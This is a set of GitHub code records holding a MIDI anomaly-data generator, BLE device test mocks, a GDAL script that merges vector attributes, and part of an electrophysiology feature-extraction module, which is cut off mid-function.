getAllMidiDFs(\"./midiData\")\n\n\ndef add_anomaly_column(csv_file_path, 
master_changes_file_path, percent_modified):\n # Load the CSV file into a pandas DataFrame\n df = pd.read_csv(csv_file_path)\n df = df.head(500)\n # Add an \"anomaly\" column filled with zeros\n df[\"anomaly\"] = 0\n\n # Create a new DataFrame to store the changes made\n changes_df = pd.DataFrame(columns=[\"filename\", \"row\", \"column\", \"amount\"])\n\n # Iterate over each row in the DataFrame and modify a random column for a random subset of rows\n num_anomalies = int(len(df) * percent_modified)\n for i in random.sample(range(len(df)), num_anomalies):\n # Modify a random column\n cols = random.sample([\"note\", \"velocity\", \"time\"], k=random.randint(1, 3))\n for col in cols:\n options = df[col].unique()\n\n if col == \"time\":\n # If \"time\" column is selected, choose a unique time value from the DataFrame\n unique_times = df[\"time\"].unique()\n unique_times = unique_times[unique_times != df.at[i, col]]\n new_time = random.choice(unique_times)\n amount = new_time - df.at[i, col]\n df.at[i, col] = new_time\n elif col == \"velocity\":\n # If \"velocity\" column is selected, choose a random value from a list and add it to the velocity value\n velocity = int(df.at[i, col])\n offset = (\n random.randint(-80, -20)\n if velocity >= 80\n else random.randint(20, 80)\n )\n new_velocity = min(max(velocity + offset, 0), 127)\n amount = new_velocity - velocity\n df.at[i, col] = new_velocity\n elif col == \"note\":\n # If \"note\" column is selected, choose a random value from a list and add it to the note value\n note = int(df.at[i, col])\n offset = random.choice(\n [-13, -12, -11, -6, -5, -3, -1, 1, 3, 5, 6, 11, 12, 13]\n )\n new_note = min(max(note + offset, 0), 127)\n amount = new_note - note\n df.at[i, col] = new_note\n else:\n # For other columns, choose a random value from the options and set the value to that\n new_value = random.choice(options)\n amount = new_value - df.at[i, col]\n df.at[i, col] = new_value\n\n # Log the changes made\n row = i + 2\n new_changes_df = pd.DataFrame(\n {\n \"filename\": f\"{csv_file_path.split('/')[-1]}{i}\",\n \"row\": row,\n \"column\": col,\n \"amount\": amount,\n },\n index=[i],\n )\n changes_df = pd.concat([changes_df, new_changes_df])\n\n # Set the \"anomaly\" flag for the modified row to 1\n df.at[i, \"anomaly\"] = len(cols)\n\n # Write the modified DataFrame to a new CSV file\n csv_filename = os.path.splitext(os.path.basename(csv_file_path))[0]\n modified_csv_file_path = os.path.join(\n \"anomalous\",\n f\"{csv_filename}_modified{str(percent_modified)[0] + str(round(percent_modified, 2))[-2:]}.csv\",\n )\n\n df.to_csv(modified_csv_file_path, index=False)\n\n # Append the changes made to the master changes CSV file\n changes_df.to_csv(master_changes_file_path, mode=\"a\", header=False, index=False)\n print(\n os.path.join(\n \"anomalous\",\n f\"{csv_filename}_modified{str(percent_modified)[0] + str(round(percent_modified, 2))[-2:]}.csv\",\n )\n )\n\n\ndef generate_anomalous_data(csv_data_dir, master_changes_file):\n # Walk through every file in the csvMidiData directory\n for root, dirs, files in os.walk(csv_data_dir):\n for file in files:\n if file.endswith(\".csv\"):\n # Call the add_anomaly_column function six times, with percent_modified increasing by 0.1 each time\n percent_modified = 0.78\n for i in range(4):\n add_anomaly_column(\n os.path.join(root, file), master_changes_file, percent_modified\n )\n percent_modified += 0.06\n\n\ndef set_anomaly_column_none(csv_file_path):\n # Load the CSV file into a pandas DataFrame\n df = 
pd.read_csv(csv_file_path)\n df = df.head(500)\n\n # Add an \"anomaly\" column filled with zeros\n df[\"anomaly\"] = 0\n\n # Define ranges of sensible note and velocity changes\n note_change_range = range(-12, 13)\n velocity_change_range = range(-30, 31)\n\n # Randomly select note and velocity changes\n note_change = np.random.choice(note_change_range)\n velocity_change = np.random.choice(velocity_change_range)\n\n # Clip note and velocity changes at MIDI bounds\n df[\"note\"] = np.clip(df[\"note\"] + note_change, 0, 127)\n df[\"velocity\"] = np.clip(df[\"velocity\"] + velocity_change, 0, 127)\n\n # Write the modified DataFrame to a new CSV file\n csv_filename = os.path.splitext(os.path.basename(csv_file_path))[0]\n modified_csv_file_path = os.path.join(\n \"anomalous\",\n f\"{csv_filename}_modified-N{note_change}V{velocity_change}.csv\",\n )\n\n df.to_csv(modified_csv_file_path, index=False)\n\n\ndef generate_nonanomalous_data(csv_data_dir):\n # Walk through every file in the csv_data_dir directory\n for root, dirs, files in os.walk(csv_data_dir):\n for file in files:\n if file.endswith(\".csv\"):\n for _ in range(6):\n set_anomaly_column_none(os.path.join(root, file))\n\n\n# generate_anomalous_data(\"csvMidiData\", \"masterChanges.csv\")\n\n\n# generate_nonanomalous_data(\"csvMidiData\")\n\n# getMidiDF(\"36693.mid\")\n","repo_name":"dpshade22/AnomalyMidi","sub_path":"src/syntheticDataGenerator.py","file_name":"syntheticDataGenerator.py","file_ext":"py","file_size_in_byte":7699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14858842444","text":"class MockedBLEDevice:\n def __init__(self):\n self.name = \"Airthings Wave+\"\n self.rssi = -69\n self.metadata = {\n \"uuids\": [\n \"00001800-0000-1000-8000-00805f9b34fb\"\n \"00001801-0000-1000-8000-00805f9b34fb\"\n \"0000180a-0000-1000-8000-00805f9b34fb\"\n \"b42e1c08-ade7-11e4-89d3-123b93f75cba\"\n \"f000ffc0-0451-4000-b000-000000000000\"\n ],\n # Represents '2930618893', a valid serial for a model 2930 (Wave+)\n \"manufacturer_data\": {820: [13, 178, 173, 174, 9, 0]},\n }\n self.address = \"80:XO:XO:XO:EE:48\"\n\n\nclass MockedBleakClient(object):\n def __init__(self, addr):\n self.addr = addr\n self.is_connected = False\n\n async def read_gatt_char(self, _uuid):\n return bytearray(\n b\"\\x01A\\x00\\x00\\x88\\x00\\x8f\\x00\\x0f\\x08X\\xbf\\xb4\\x02r\\x00\\x00\\x00\\x1c\\x06\"\n )\n\n async def connect(self):\n self.is_connected = True\n return True\n\n async def disconnect(self):\n self.is_connected = False\n return True\n\n async def __aenter__(self):\n await self.connect()\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n await self.disconnect()\n return True\n\n\nclass MockedFailingBleakClient(MockedBleakClient):\n async def connect(self):\n self.is_connected = False\n return False\n","repo_name":"ztroop/wave-reader-utils","sub_path":"tests/mocks.py","file_name":"mocks.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"3818743588","text":"import os\nimport sys\nimport time\nimport logging\nimport numpy\nimport pickle\nfrom rtree import index\nimport shapely\nimport shapely.wkb\nimport shapely.speedups\n\nfrom osgeo import gdal, osr, ogr\n\nimport pygeoprocessing\nimport taskgraph\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format=(\n '%(asctime)s (%(relativeCreated)d) %(levelname)s %(name)s'\n ' [%(funcName)s:%(lineno)d] %(message)s'),\n 
stream=sys.stdout)\nLOGGER = logging.getLogger(__name__)\n\n\ndef combine_vector_attributes(\n base_vector_path, combine_vector_path, attr_list):\n \"\"\"Add fields from ``combine_vector_path`` to ``base_vector_path``.\n\n Args:\n base_vector_path (string): path to a GDAL vector file. Used as the\n base for the output vector.\n combine_vector_path (string): path to a GDAL vector file. Used as the\n base for the output vector.\n attr_list (list): list of ``combine_vector_path`` attributes to add to\n ``base_vector_path``.\n\n Returns:\n None\n \"\"\"\n LOGGER.debug(\"Add attributes to vector\")\n base_vector_info = pygeoprocessing.get_vector_info(base_vector_path)\n\n base_vector = gdal.OpenEx(base_vector_path, gdal.GA_Update | gdal.OF_VECTOR)\n combine_vector = gdal.OpenEx(combine_vector_path, gdal.OF_VECTOR)\n\n layer = base_vector.GetLayer(0)\n layer_dfn = layer.GetLayerDefn()\n number_features = layer.GetFeatureCount()\n\n combine_layer = combine_vector.GetLayer(0)\n combine_layer_dfn = combine_layer.GetLayerDefn()\n\n LOGGER.info(f'Attrs to add: {attr_list}')\n field_names = [field.name for field in layer.schema]\n for field_key in attr_list:\n if field_key in field_names:\n continue\n target_field = ogr.FieldDefn(field_key, ogr.OFTReal)\n layer.CreateField(target_field)\n\n # Copy all of the features in layer to the new shapefile\n last_time = time.time()\n layer.StartTransaction()\n for feature_index, feature in enumerate(layer):\n last_time = pygeoprocessing._invoke_timed_callback(\n last_time, lambda: LOGGER.info(\n f'{(feature_index / number_features):.2f} processed'), 30.0)\n\n fid = feature.GetFID()\n feat_name = feature.GetFieldAsString('GID_1')\n\n # for RCP, not guaranteed we have the same FIDs / feature count\n # because I didn't use the masked antartica shape file when gathering\n # stats\n feature_match = False\n for combine_feature in combine_layer:\n comb_name = combine_feature.GetFieldAsString('GID_1')\n if comb_name == feat_name:\n feature_match = True\n break\n if not feature_match:\n continue\n\n for field_name in attr_list:\n combine_value = combine_feature.GetFieldAsDouble(field_name)\n fld_idx = feature.GetFieldIndex(field_name)\n if combine_value is None:\n combine_value = 0.0\n\n feature.SetField(fld_idx, float(combine_value))\n\n layer.SetFeature(feature)\n combine_layer.ResetReading()\n feature = None\n combine_feature = None\n\n layer.CommitTransaction()\n\n layer = None\n vector = None\n combine_layer = None\n combine_vector = None\n\ndef copy_vector(base_vector_path, target_vector_path):\n \"\"\" \"\"\"\n LOGGER.debug(\"Copying vector\")\n base_vector = gdal.OpenEx(base_vector_path, gdal.OF_VECTOR)\n\n layer = base_vector.GetLayer(0)\n layer_dfn = layer.GetLayerDefn()\n\n # if this file already exists, then remove it\n if os.path.isfile(target_vector_path):\n os.remove(target_vector_path)\n\n # create a new shapefile from the orginal_datasource\n target_driver = ogr.GetDriverByName('GPKG')\n target_vector = target_driver.CreateDataSource(target_vector_path)\n target_vector.CopyLayer(layer, layer_dfn.GetName())\n\n layer = None\n base_vector = None\n target_vector = None\n\n\nif __name__ == \"__main__\":\n\n LOGGER.debug(\"Starting Processing\")\n\n output_root_dir = os.path.join(\n 'C:', os.sep, 'Users', 'ddenu', 'Workspace', 'NatCap', 'Repositories',\n 'global-web-viewer', 'processed-data')\n\n gadm0_root_dir = os.path.join(\n output_root_dir, 'gadm_stats_vectors', 'gadm36_0_clipped_stats')\n gadm1_root_dir = os.path.join(\n output_root_dir, 
'gadm_stats_vectors', 'gadm36_1_clipped_stats')\n hybas_root_dir = os.path.join(output_root_dir, 'hybas_stats_vectors')\n\n #combine_vector_dir = os.path.join(gadm0_root_dir, 'combined_dir')\n combine_vector_dir = os.path.join(gadm1_root_dir, 'combined_dir')\n #combine_vector_dir = os.path.join(hybas_root_dir, 'combined_dir')\n if not os.path.exists(combine_vector_dir):\n os.mkdir(combine_vector_dir)\n\n ### TaskGraph Set Up\n #taskgraph_working_dir = os.path.join(\n # combine_vector_dir, '_stats_taskgraph_working_dir')\n\n #n_workers = -1\n #task_graph = taskgraph.TaskGraph(taskgraph_working_dir, n_workers)\n ###\n\n #base_vector_path = os.path.join(\n # gadm0_root_dir, 'gadm36_0_clipped_sed_stats.gpkg')\n combined_out_path = os.path.join(\n combine_vector_dir, 'gadm1_all_stats.gpkg')\n #base_vector_path = os.path.join(\n # gadm1_root_dir, 'gadm36_1_clipped_sed_perc.gpkg')\n #combined_out_path = os.path.join(\n # combine_vector_dir, 'gadm1_all_stats.gpkg')\n #base_vector_path = os.path.join(\n # hybas_root_dir, 'merged_sed_vectors', 'hybas_all_sed.shp')\n #combined_out_path = os.path.join(\n # combine_vector_dir, 'hybas_all_service_stats.gpkg')\n\n #copy_vector(base_vector_path, combined_out_path)\n\n # created the base with sed, so not needed again\n #service_id_list = ['nit', 'acc', 'crop']\n #service_id_list = ['nit', 'acc']\n service_id_list = ['rcp']\n\n for service_id in service_id_list:\n #service_vector_path = os.path.join(\n # gadm0_root_dir, f'gadm36_0_clipped_{service_id}_stats.gpkg')\n #service_vector_path = os.path.join(\n # gadm1_root_dir, f'gadm36_1_clipped_{service_id}_perc.gpkg')\n #service_vector_path = os.path.join(\n # hybas_root_dir, f'merged_{service_id}_vectors', \n # f'hybas_all_{service_id}.shp')\n #attr_list = [f'{service_id}_mean', f'{service_id}_pct']\n\n # Add RCP attributes\n #service_vector_path = os.path.join(\n # output_root_dir, 'coastal_protection_stats_vectors',\n # 'results_gadm36_1', 'gadm36_1_rcp_stats.gpkg')\n service_vector_path = os.path.join(\n output_root_dir, 'coastal_protection_stats_vectors',\n 'gadm36_1_rcp_stats.gpkg')\n attr_list = [\n f'{service_id}-mean', f'{service_id}-count', f'{service_id}-sum']\n\n combine_vector_attributes(\n combined_out_path, service_vector_path, attr_list)\n\n","repo_name":"natcap/global-web-viewer","sub_path":"data/combine-vector-attributes.py","file_name":"combine-vector-attributes.py","file_ext":"py","file_size_in_byte":6825,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"33114712972","text":"\"\"\"\n================================================================================\n\tElectrophysiology Feature Extraction Utility Functions\n================================================================================\n\n\tAuthor: Eric Johnson\n\tDate Created: Thursday, March 7, 2019\n\tEmail: ericjohnson1.2015@u.northwestern.edu\n\n================================================================================\n================================================================================\n\n\tThis file contains a module of functions that will be useful in the \n\textraction of various features from electrophysiology data.\n\n\tIn particular, this function will contain methods for protocol detection and\n\tfor the creation of protocol dictionaries.\n\n================================================================================\n================================================================================\n\"\"\"\nfrom copy import 
deepcopy\nimport numpy as np\nfrom scipy.optimize import curve_fit\nimport scipy.signal as sig\n\nimport Objectives.Electrophysiology.ephys_objs as epo\n\nimport Utility.ABF_util as abf\nimport Utility.utility as utl\n\n################################################################################\n##\tSet Protocol ID Numbers\n################################################################################\nif True:\n\tEPHYS_PROT_REST\t\t\t\t= 0\n\tEPHYS_PROT_DEPOLSTEP\t\t= 1\n\tEPHYS_PROT_HYPERPOLSTEP\t\t= 2\n\tEPHYS_PROT_DEPOLSTEPS\t\t= 3\n\tEPHYS_PROT_HYPERPOLSTEPS\t= 4\n\tEPHYS_PROT_CONSTHOLD\t\t= 5\n\n\n################################################################################\n################################################################################\n##\n##\t\tElectrophysiology Protocol Methods\n##\n################################################################################\n################################################################################\n\n################################################################################\n## Get Experimental Protocol\n################################################################################\ndef getExpProtocol(hdr, useList=True):\n\t\"\"\"getExpProtocol(hdr, useList=True)\n\n\tThis function will attempt to automatically detect the type of protocol that\n\twas implemented in a given data recording by parsing the header of the abf\n\tfile.\n\n\tAt the moment, we can reliably detect 6 different protocols:\n\n\tEPHYS_PROT_REST\t\t\t\t= 0\n\t\tThis is detected by noting that the entire waveform is 0\n\n\tEPHYS_PROT_DEPOLSTEP\t\t= 1\n\n\tEPHYS_PROT_HYPERPOLSTEP\t\t= 2\n\n\tEPHYS_PROT_DEPOLSTEPS\t\t= 3\n\n\tEPHYS_PROT_HYPERPOLSTEPS\t= 4\n\n\tEPHYS_PROT_CONSTHOLD\t\t= 5\n\t\tThis is detected by noting that the entire waveform is being held at one\n\t\tvalue.\n\n\tTO DO:\n\t======\n\t - Implement use of useList\n\t - Allow for other channels to be used, not just mV channel.\n\t - Allow for ramped epochs?\n\n\tInputs:\n\t=======\n\thdr \t\t(dict)\t\tHeader structure as extracted from an abf file.\n\t\t\t\t\t\t\t(Use abf.ABF_read(abf file))\n\n\tuseList \t(bool)\t\t(Optional, not implemented) Eventually we would like\n\t\t\t\t\t\t\tto have an annotated database of the data that would\n\t\t\t\t\t\t\tbe cross-referenced to indicate the type of\n\t\t\t\t\t\t\tprotocol, for now we just try to autodetect.\n\n\tOutputs:\n\t========\n\tprotNo \t\t(int)\t\tNumber indicating which protocol has been detected.\n\t\t\t\t\t\t\t-1 indicates that an unknown protocol has been\n\t\t\t\t\t\t\tdetected.\n
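\n\tExample (a hypothetical usage sketch; hdr comes from abf.ABF_read on an\n\tabf file):\n\n\t\tprotNo = getExpProtocol(hdr)\n\t\tif protNo == EPHYS_PROT_CONSTHOLD:\n\t\t\tprint('constant holding-current recording')\n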
\t\"\"\"\n\n\t## Check that our default channel has mV units\n\tif (hdr['recChUnits'][hdr['nADCSamplingSeq'][0]] != 'mV'):\n\t\treturn -1\n\n\t## Check that the epoch types are either disabled or steps\n\t## (Ramps are not allowed at this time)\n\tif np.any(hdr['nEpochType'] > 1):\n\t\treturn -1\n\n\t## Get the indices of the relevant epochs\n\tepochIdx = getEpochIdx(hdr)\n\n\t## Get the applied waveform for this observation\n\twaveform = abf.GetWaveform(hdr, hdr['lActualEpisodes'])\n\n\t## If the waveform is all 0, then assume the protocol is rest\n\tif np.all(waveform == 0):\n\t\treturn EPHYS_PROT_REST\n\n\t## If the waveform has one value and there is only one epoch (after \n\t## holding), then assume the protocol is a constant hold.\n\tif np.sum(hdr['nEpochType'][0] == 1) == 1:\n\t\tif len(np.unique(waveform)) == 1:\n\t\t\treturn EPHYS_PROT_CONSTHOLD\n\n\t## If the waveform has two values, and there are more than two epochs (after\n\t## holding), then assume that the protocol is a (set of) depol or hyperpol\n\t## step(s).\n\tholdCurr = abf.GetHoldingLevel(hdr, hdr['nActiveDACChannel'], 1)\n\tif np.sum(hdr['nEpochType'][0] == 1) > 2:\n\t\t## Check the unique epoch current levels\n\t\tepochLevs = hdr['fEpochInitLevel'][0][hdr['nEpochType'][0].nonzero()]\n\t\tepochLevs = np.unique(epochLevs)\n\t\t## If there are two unique levels...\n\t\tif len(epochLevs) == 2:\n\t\t\t## ...but both differ from the holding current, break out\n\t\t\tif np.sum(epochLevs != holdCurr) > 1:\n\t\t\t\treturn -1\n\n\t\t\t## Get non-holding current level\n\t\t\tnonZeroLev = epochLevs[(epochLevs != holdCurr).nonzero()]\n\n\t\t\t## If it's positive, it's a depol step(s)\n\t\t\tif nonZeroLev > holdCurr:\n\t\t\t\tif hdr['lActualEpisodes'] > 1:\n\t\t\t\t\treturn EPHYS_PROT_DEPOLSTEPS\n\t\t\t\telse:\n\t\t\t\t\treturn EPHYS_PROT_DEPOLSTEP\n\n\t\t\t## If it's negative, it's a hyperpol step(s)\n\t\t\telse:\n\t\t\t\tif hdr['lActualEpisodes'] > 1:\n\t\t\t\t\treturn EPHYS_PROT_HYPERPOLSTEPS\n\t\t\t\telse:\n\t\t\t\t\treturn EPHYS_PROT_HYPERPOLSTEP\n\n\t\t## If there's only one current level...\n\t\telif len(epochLevs) == 1:\n\t\t\t## Get any increments\n\t\t\tepochIncs = hdr['fEpochLevelInc'][0]\n\t\t\tepochIncs = np.unique(epochIncs[(hdr['nEpochType'][0]).nonzero()])\n\n\t\t\t## Check whether there's a single non-zero current increment\n\t\t\tif np.sum(epochIncs != 0) == 1:\n\n\t\t\t\t## Get the value of the increment\n\t\t\t\tnonZeroInc = epochIncs[(epochIncs).nonzero()]\n\n\t\t\t\t## If it's positive, it's a depol step(s)\n\t\t\t\tif nonZeroInc > 0:\n\t\t\t\t\tif hdr['lActualEpisodes'] > 1:\n\t\t\t\t\t\treturn EPHYS_PROT_DEPOLSTEPS\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn EPHYS_PROT_DEPOLSTEP\n\n\t\t\t\t## If it's negative, it's a hyperpol step(s)\n\t\t\t\telse:\n\t\t\t\t\tif hdr['lActualEpisodes'] > 1:\n\t\t\t\t\t\treturn EPHYS_PROT_HYPERPOLSTEPS\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn EPHYS_PROT_HYPERPOLSTEP\n\n\t\t\telif len(epochIncs) == 1:\n\t\t\t\treturn EPHYS_PROT_CONSTHOLD\n\n\t## If it's none of these, return unknown\n\treturn -1\n\n\n################################################################################\n## Get Epoch Indices for the Relevant Channel\n################################################################################\ndef getEpochIdx(hdr):\n\t\"\"\"getEpochIdx(hdr)\n\n\tThis is a shortcut to get the epoch indices (in the waveform array) of the\n\tvoltage channel (which is usually what we want). 
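For example, the\n\t(hypothetical) one-liner epochIdx = getEpochIdx(hdr) returns the per-epoch\n\tboundary indices for the active DAC channel. 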
This is basically a \n\twrapper for abf.GetEpochIdx, which outputs the epoch indices for all\n\tchannels.\n\t\"\"\"\n\n\treturn abf.GetEpochIdx(hdr)[hdr['nActiveDACChannel']]\n\n\n################################################################################\n################################################################################\n##\n##\t\tElectrophysiology Feature Extraction Methods\n##\n################################################################################\n################################################################################\n\n################################################################################\n## Get Electrophysiology Features\n################################################################################\ndef getEphysFeatures(dataDict, infoDict, verbose=None):\n\n\tif verbose is not None:\n\t\ttry:\n\t\t\tverbose = utl.force_pos_int(verbose,\n\t\t\t\tname='epu.getEphysFeatures.verbose', zero_ok=True)\n\t\texcept:\n\t\t\tverbose = 0\n\telse:\n\t\ttry:\n\t\t\tverbose = infoDict['objectives']['verbose']\n\t\texcept:\n\t\t\tverbose = 0\n\n\tif verbose:\n\t\tprint_str = \"\\nExtracting Electrophysiology Features from Data\\n\"\n\t\tprint(print_str + (len(print_str)+1)*\"=\")\n\n\tdataFeat = {}\n\n\tkeys = sorted(list(dataDict.keys()))\n\n\tfor key in keys:\n\t\tdata = dataDict[key]['data']\n\t\thdr = dataDict[key]['header']\n\n\t\tprotocol = getExpProtocol(hdr)\n\n\t\tif protocol == EPHYS_PROT_REST:\n\t\t\tdataFeat = getRestFeatures(data, hdr, infoDict, dataFeat, key=key,\n\t\t\t\tverbose=verbose)\n\n\t\telif protocol == EPHYS_PROT_DEPOLSTEP:\n\t\t\tdataFeat = getDepolFeatures(data, hdr, infoDict, dataFeat, key=key,\n\t\t\t\tverbose=verbose)\n\n\t\telif protocol == EPHYS_PROT_HYPERPOLSTEP:\n\t\t\tdataFeat = getHyperpolFeatures(data, hdr, infoDict, dataFeat,\n\t\t\t\tkey=key, verbose=verbose)\n\n\t\telif protocol == EPHYS_PROT_DEPOLSTEPS:\n\t\t\tdataFeat = getDepolStepsFeatures(data, hdr, infoDict, dataFeat,\n\t\t\t\tkey=key, verbose=verbose)\n\n\t\telif protocol == EPHYS_PROT_HYPERPOLSTEPS:\n\t\t\tdataFeat = getHyperpolStepsFeatures(data, hdr, infoDict, dataFeat,\n\t\t\t\tkey=key, verbose=verbose)\n\n\t\telif protocol == EPHYS_PROT_CONSTHOLD:\n\t\t\tdataFeat = getConstHoldFeatures(data, hdr, infoDict, dataFeat,\n\t\t\t\tkey=key, verbose=verbose)\n\n\t\telse:\n\t\t\tif verbose > 1:\n\t\t\t\tprint_str = f\"Unknown protocol = {protocol}, cannot extract \"\n\t\t\t\tprint(print_str + \"features!\")\n\t\t\tcontinue\n\n\treturn dataFeat\n\n\n################################################################################\n## Get Electrophysiology Features from Rest Protocol\n################################################################################\ndef getRestFeatures(data, hdr, infoDict, dataFeat, key=None, verbose=0):\n\n\tverbose = utl.force_pos_int(verbose, name='epu.getRestFeatures.verbose',\n\t\tzero_ok=True)\n\n\tif verbose > 1:\n\t\tprint(\"Getting features from REST PROTOCOL\")\n\n\tdata = data[:, 0].squeeze()\n\n\tspikeIdx, spikeVals = epo.getSpikeIdx(data, dt=infoDict['data']['dt'],\n\t\t**infoDict['objectives']['Spikes'])\n\n\tfor obj in infoDict['objectives']:\n\n\t\tsubInfo = infoDict['objectives'][obj]\n\n\t\t## For rest protocols, only want mean fit.\n\t\tsubInfo['fit'] = 'mean'\n\n\t\tif obj == 'ISI':\n\t\t\terr = epo.getISI(spikeIdx, dt=infoDict['data']['dt'],\n\t\t\t\t**subInfo)\n\n\t\t\tif verbose > 2:\n\t\t\t\tprint(f\"ISI = {err:.4g}ms (FR = {1/err:.4g}Hz)\")\n\n\t\telif obj == 'Amp':\n\t\t\terr = 
epo.getSpikeAmp(spikeIdx, spikeVals,\n\t\t\t\tdt=infoDict['data']['dt'], **subInfo)\n\n\t\t\tif verbose > 2:\n\t\t\t\tprint(f\"Amp = {err:.4g}mV\")\n\n\t\telif obj == 'PSD':\n\t\t\terr = epo.getPSD(data, spikeIdx,\n\t\t\t\tdt=infoDict['data']['dt'], **subInfo)\n\n\t\t\tif verbose > 2:\n\t\t\t\tprint(f\"PSD = {err:.4g}mV\")\n\n\t\telse:\n\t\t\tcontinue\n\n\t\ttry:\n\t\t\t_ = dataFeat[obj]\n\t\texcept KeyError:\n\t\t\tdataFeat[obj] = {}\n\n\t\ttry:\n\t\t\t_ = dataFeat[obj]['rest']\n\t\texcept KeyError:\n\t\t\tdataFeat[obj]['rest'] = {}\n\n\t\tif key is not None:\n\t\t\tkey = utl.force_pos_int(key, name='epu.getRestFeatures.key',\n\t\t\t\tzero_ok=True, verbose=verbose)\n\t\telse:\n\t\t\tkey = max(dataFeat[obj]['rest'].keys(), default=-1) + 1  # next unused key\n\n\t\tdataFeat[obj]['rest'][key] = deepcopy(err)\n\n\treturn dataFeat.copy()\n\n\n################################################################################\n## Get Electrophysiology Features from Depolarization Step Protocol\n################################################################################\ndef getDepolFeatures(data, hdr, infoDict, dataFeat, key=None, verbose=0):\n\n\tverbose = utl.force_pos_int(verbose, name='epu.getDepolFeatures.verbose',\n\t\tzero_ok=True)\n\n\tif verbose > 1:\n\t\tprint(\"Getting features from DEPOL STEP PROTOCOL\")\n\n\tdt = deepcopy(infoDict['data']['dt'])\n\n\tdata = data[:, 0].squeeze()\n\n\tdpData, dpIdx, dpI = getDepolIdx(data, hdr, protocol=EPHYS_PROT_DEPOLSTEP)\n\n\ttGrid = abf.GetTimebase(hdr, 0)[dpIdx[0]:dpIdx[1]]*dt\n\n\tspikeIdx, spikeVals = epo.getSpikeIdx(dpData, dt=dt,\n\t\t**infoDict['objectives']['Spikes'])\n\n\tfor obj in infoDict['objectives']:\n\n\t\tsubInfo = infoDict['objectives'][obj]\n\n\t\tif obj == \"ISI\":\n\t\t\tif len(spikeIdx) == 0:\n\t\t\t\tprint(\"NO SPIKES\")\n\t\t\t\tif subInfo['depol'] in ['thirds']:\n\t\t\t\t\terr = [np.inf, np.inf]\n\t\t\t\telse:\n\t\t\t\t\terr = np.inf\n\n\t\t\telif subInfo['depol'] in ['thirds', 'lastthird']:\n\t\t\t\tbounds = np.linspace(0, len(tGrid), 4).astype(int)\n\n\t\t\t\terr = []\n\n\t\t\t\tfirst = spikeIdx[spikeIdx < bounds[1]]\n\t\t\t\terr.append(epo.getISI(first, dt=dt, **subInfo))\n\n\t\t\t\tlast = spikeIdx[spikeIdx >= bounds[2]]\n\t\t\t\terr.append(epo.getISI(last, dt=dt, **subInfo))\n\n\t\t\t\tif subInfo['depol'] == 'lastthird':\n\t\t\t\t\terr = err[-1]\n\n\t\t\t\t\tif verbose > 2:\n\t\t\t\t\t\tprint(f\"ISI = {err:.4g}ms (FR = {1/err:.4g}Hz)\")\n\n\t\t\t\telse:\n\t\t\t\t\tif verbose > 2:\n\t\t\t\t\t\tfor e in err:\n\t\t\t\t\t\t\tprint(f\"ISI = {e:.4g}ms (FR = {1/e:.4g}Hz)\")\n\n\t\t\telse:\n\t\t\t\terr = epo.getISI(spikeIdx, dt=dt, **subInfo)\n\n\t\telif obj == 'Amp':\n\t\t\tif len(spikeIdx) == 0:\n\t\t\t\terr = np.nan\n\n\t\t\telse:\n\t\t\t\terr = epo.getSpikeAmp(spikeIdx, spikeVals, **subInfo)\n\n\t\t\t\tif not isinstance(err, float):\n\t\t\t\t\terr = err[1]\n\n\t\t\t\tif verbose > 2:\n\t\t\t\t\tprint(f\"Amp = {err:.4g}mV\")\n\n\t\telif obj == 'PSD':\n\t\t\terr = epo.getPSD(dpData, spikeIdx, dt=dt, **subInfo)\n\n\t\t\tif not isinstance(err, float):\n\t\t\t\terr = err[1]\n\n\t\t\tif verbose > 2:\n\t\t\t\tprint(f\"PSD = {err:.4g}mV\")\n\n\t\telse:\n\t\t\tcontinue\n\n\t\ttry:\n\t\t\t_ = dataFeat[obj]\n\t\texcept KeyError:\n\t\t\tdataFeat[obj] = {}\n\n\t\ttry:\n\t\t\t_ = dataFeat[obj]['depol']\n\t\texcept KeyError:\n\t\t\tdataFeat[obj]['depol'] = {}\n\n\t\tif key is not None:\n\t\t\tkey = utl.force_pos_int(key, name='epu.getDepolFeatures.key',\n\t\t\t\tzero_ok=True, verbose=verbose)\n\t\telse:\n\t\t\tkey = max(dataFeat[obj]['depol'].keys(), default=-1) + 1  # next unused key\n\n\t\tdataFeat[obj]['depol'][key] = deepcopy(err)\n\n\treturn dataFeat.copy()\n\n\n################################################################################\n## Get Electrophysiology Features from Hyperpolarization Step Protocol\n################################################################################\ndef getHyperpolFeatures(data, hdr, infoDict, dataFeat, key=None, verbose=0):\n\n\tverbose = utl.force_pos_int(verbose, name='epu.getHyperpolFeatures.verbose',\n\t\tzero_ok=True)\n\n\tif verbose > 1:\n\t\tprint(\"Getting features from HYPERPOL STEP PROTOCOL\")\n\n\tdt = deepcopy(infoDict['data']['dt'])\n\n\tdata = data[:, 0].squeeze()\n\n\thpData, hpIdx, hpI = getHyperpolIdx(data, hdr,\n\t\tprotocol=EPHYS_PROT_HYPERPOLSTEP)\n\n\tspikeIdx, spikeVals = epo.getSpikeIdx(hpData, dt=dt,\n\t\t**infoDict['objectives']['Spikes'])\n\n\tfor obj in infoDict['objectives']:\n\n\t\tsubInfo = infoDict['objectives'][obj]\n\n\t\tif obj == 'PSD':\n\t\t\terr = epo.getPSD(data, spikeIdx, dt=dt, **subInfo)\n\n\t\t\tif not isinstance(err, float):\n\t\t\t\terr = err[1]\n\n\t\t\tif verbose > 2:\n\t\t\t\tprint(f\"PSD = {err:.4g}mV\")\n\n\t\telse:\n\t\t\tcontinue\n\n\t\ttry:\n\t\t\t_ = dataFeat[obj]\n\t\texcept KeyError:\n\t\t\tdataFeat[obj] = {}\n\n\t\ttry:\n\t\t\t_ = dataFeat[obj]['hyperpol']\n\t\texcept KeyError:\n\t\t\tdataFeat[obj]['hyperpol'] = {}\n\n\t\tif key is not None:\n\t\t\tkey = utl.force_pos_int(key, name='epu.getHyperpolFeatures.key',\n\t\t\t\tzero_ok=True, verbose=verbose)\n\t\telse:\n\t\t\tkey = max(dataFeat[obj]['hyperpol'].keys(), default=-1) + 1  # next unused key\n\n\t\tdataFeat[obj]['hyperpol'][key] = deepcopy(err)\n\n\treturn 